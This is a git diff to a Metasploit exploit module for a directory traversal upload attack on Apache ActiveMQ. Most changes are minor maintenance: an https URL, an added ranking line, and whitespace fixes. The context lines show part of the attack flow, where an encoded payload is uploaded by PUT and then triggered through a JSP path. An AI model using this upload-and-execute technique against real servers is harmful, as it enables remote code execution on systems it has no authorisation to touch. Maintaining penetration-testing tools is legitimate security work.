diff --git a/modules/exploits/windows/http/apache_activemq_traversal_upload.rb b/modules/exploits/windows/http/apache_activemq_traversal_upload.rb index d05e660aa1..516f3f2882 100644 --- a/modules/exploits/windows/http/apache_activemq_traversal_upload.rb +++ b/modules/exploits/windows/http/apache_activemq_traversal_upload.rb @@ -1,9 +1,10 @@ ## -# This module requires Metasploit: http://metasploit.com/download +# This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -95,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'PUT', 'data' => payload.encoded }) - + print_status("Payload sent. Attempting to execute the payload.") res1 = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"), @@ -110,4 +111,4 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::PayloadFailed, "Failed to execute the payload") end end -end \ No newline at end of file +end